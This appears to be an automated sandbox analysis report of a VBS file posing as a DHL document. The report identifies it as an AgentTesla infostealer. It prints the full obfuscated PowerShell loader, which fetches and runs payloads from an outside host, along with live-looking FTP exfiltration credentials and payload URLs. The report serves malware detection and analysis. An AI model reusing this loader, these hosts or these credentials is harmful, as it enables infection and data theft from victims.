            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Found malware configuration
            Source: conhost.exe.6748.4.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "ftp://ftp.concaribe.com", "Password": "net_log_releasing_connection"}
            Multi AV Scanner detection for submitted file
            Source: DHL_RF_20200712_BN_N0095673441.vbsVirustotal: Detection: 23%Perma Link
            Source: DHL_RF_20200712_BN_N0095673441.vbsReversingLabs: Detection: 21%
            Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: Binary string: .Core.pdb.s source: powershell.exe, 0000000A.00000002.2283297279.0000000007B7A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2283297279.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: nagement.Automation.pdb source: powershell.exe, 0000000A.00000002.2287976450.0000000008C96000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Uses ping.exe to check the status of other devices and networks
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1
            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownFTP traffic detected: 192.185.13.234:21 -> 192.168.2.4:49740 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 01:04. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 01:04. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 01:04. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /vsp1/Duplo.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: mnajjar.deConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /vsp/izoOgnnlVO233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: mnajjar.deCache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /vsp1/Duplo.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: mnajjar.deConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /vsp/izoOgnnlVO233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: mnajjar.deCache-Control: no-cache
            Source: unknownDNS traffic detected: queries for: google.com
            Source: wscript.exe, 00000000.00000003.1671838284.000001CF477B4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1671339268.000001CF477B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/-w
            Source: wscript.exe, 00000000.00000002.1692866742.000001CF4585A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691568074.000001CF4583E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691923254.000001CF4585A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: wscript.exe, 00000000.00000003.1671772299.000001CF458F2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1671376985.000001CF458F2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672152076.000001CF458F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: wscript.exe, 00000000.00000002.1692866742.000001CF4585A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691568074.000001CF4583E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691923254.000001CF4585A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
            Source: wscript.exe, 00000000.00000002.1692955272.000001CF45885000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691568074.000001CF4583E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691766619.000001CF45884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabxT
            Source: wscript.exe, 00000000.00000003.1672126380.000001CF47731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?a5b3f90d87
            Source: powershell.exe, 00000007.00000002.2461994719.000001B6C1867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2461994719.000001B6C2EFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2461994719.000001B6C33F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mnajjar.de
            Source: powershell.exe, 00000007.00000002.2461994719.000001B6C1867000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mnajjar.de/vsp1/Duplo.msoP
            Source: powershell.exe, 0000000A.00000002.2276635267.0000000005267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mnajjar.de/vsp1/Duplo.msoXR
            Source: powershell.exe, 00000007.00000002.2604034817.000001B6D16B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2280052237.000000000617B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000A.00000002.2276635267.0000000005267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000007.00000002.2461994719.000001B6C1641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2276635267.0000000005111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 0000000A.00000002.2276635267.0000000005267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000007.00000002.2461994719.000001B6C1641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000A.00000002.2276635267.0000000005111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBdq
            Source: powershell.exe, 0000000A.00000002.2280052237.000000000617B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000A.00000002.2280052237.000000000617B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000A.00000002.2280052237.000000000617B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000000A.00000002.2276635267.0000000005267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000007.00000002.2461994719.000001B6C2852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000007.00000002.2604034817.000001B6D16B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2280052237.000000000617B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49739 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi32_7332.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 4296, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Very long command line found
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6312
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6312
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6312Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6312Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasS
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dirJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasSJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B8BBF427_2_00007FFD9B8BBF42
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B8BB1967_2_00007FFD9B8BB196
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08A2308010_2_08A23080
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0058A9E715_2_0058A9E7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00584A6015_2_00584A60
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00583E4815_2_00583E48
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0058419015_2_00584190
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0058E45B15_2_0058E45B
            Source: DHL_RF_20200712_BN_N0095673441.vbsInitial sample: Strings found which are bigger than 50
            Source: amsi32_7332.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 4296, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@21/9@4/4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Luminescences.skaJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:396:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yp5pqg1d.kqs.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_RF_20200712_BN_N0095673441.vbs"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4296
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7332
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: DHL_RF_20200712_BN_N0095673441.vbsVirustotal: Detection: 23%
            Source: DHL_RF_20200712_BN_N0095673441.vbsReversingLabs: Detection: 21%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_RF_20200712_BN_N0095673441.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1
            Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping %.%.%.%
            Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasS
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. 